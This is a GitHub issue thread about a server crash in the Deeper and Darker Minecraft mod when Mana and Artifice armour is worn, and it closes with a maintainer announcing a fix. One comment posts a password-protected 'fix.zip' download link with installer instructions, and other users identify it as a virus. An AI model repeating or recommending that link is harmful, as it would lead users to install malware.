### ISSUE TITLE
Taking damage causes crash when using non-vanilla armor

### ISSUE THREAD

**Issue by PirateSee** [KyaniteMods/DeeperAndDarker#351]
**Minecraft Version**: 1.20.1
**Mod Version**: 1.3.0, 1.3.1
**Mod Loader**: forge

**Description**:
On dedicated servers, any living entity wearing Mana and Artifice armour taking damage while Deeper and Darker is installed causes a server crash.

**To Reproduce**:
1. Join a dedicated server with Deeper and Darker and Mana and Artifice installed
2. Have some living entity (such as a player) wear some armour from Mana and Artifice
3. Have them take damage from a non-armour ignoring source

**Additional context**:
This issue appears to be caused by a client-only function that Mana and Artifice registers, which only causes errors when ran on a dedicated server.

These logs are from a larger modpack:

[crash-2024-08-29_04.06.57-server.txt](https://github.com/user-attachments/files/16790675/crash-2024-08-29_04.06.57-server.txt)

[latest.log](https://github.com/user-attachments/files/16790654/latest.log)

**Comment by Kudjo-Grand** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NolanHewitt** [comment]
Don't download that, its a virus

**Comment by NewJumper** [comment]
the mod is a virus or the crash log?

**Comment by PirateSee** [comment]
someone posted a suspicious mediafire link which has since been removed, that was the virus

**Comment by NewJumper** [comment]
updated your post to target forge

**Comment by NewJumper** [comment]
updated your post to target 1.3 and 1.3.1

**Comment by NewJumper** [comment]
fixed in 6c0a9b429fdc425a299511cf177c690b22d9beca for version 1.3.2 (releasing friday)
